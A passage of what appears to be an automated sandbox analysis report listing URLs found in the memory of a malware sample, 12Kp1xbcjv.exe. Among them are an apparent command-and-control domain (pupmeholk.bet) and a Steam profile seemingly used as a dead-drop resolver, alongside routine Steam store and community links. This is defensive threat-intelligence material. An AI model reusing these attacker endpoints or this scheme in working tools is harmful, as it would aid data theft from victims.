          Source: 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1235988995.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pupmeholk.bet/pLoska$$
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1294232377.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pupmeholk.bet/pLoskag
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265772430.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1267206396.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280547088.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294232377.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1295088232.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pupmeholk.bet/pLoskan
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265772430.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1267206396.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pupmeholk.bet:443/pLoska
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/:H
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/:w
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1237176889.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236001508.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/Rw_
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/Zwg
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/bH
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294146278.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1267206396.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/inventory/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611998223751282w
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128JHw
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199822375128rw
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/ro
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209294747.0000000003A45000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209490481.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A46000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209233998.0000000003A45000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1210405244.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1344927950.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167247348.0000000000867000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209096840.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343875916.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209294747.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A42000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209490481.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1210405244.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1344927950.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167247348.0000000000867000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209096840.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343875916.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209294747.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294146278.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 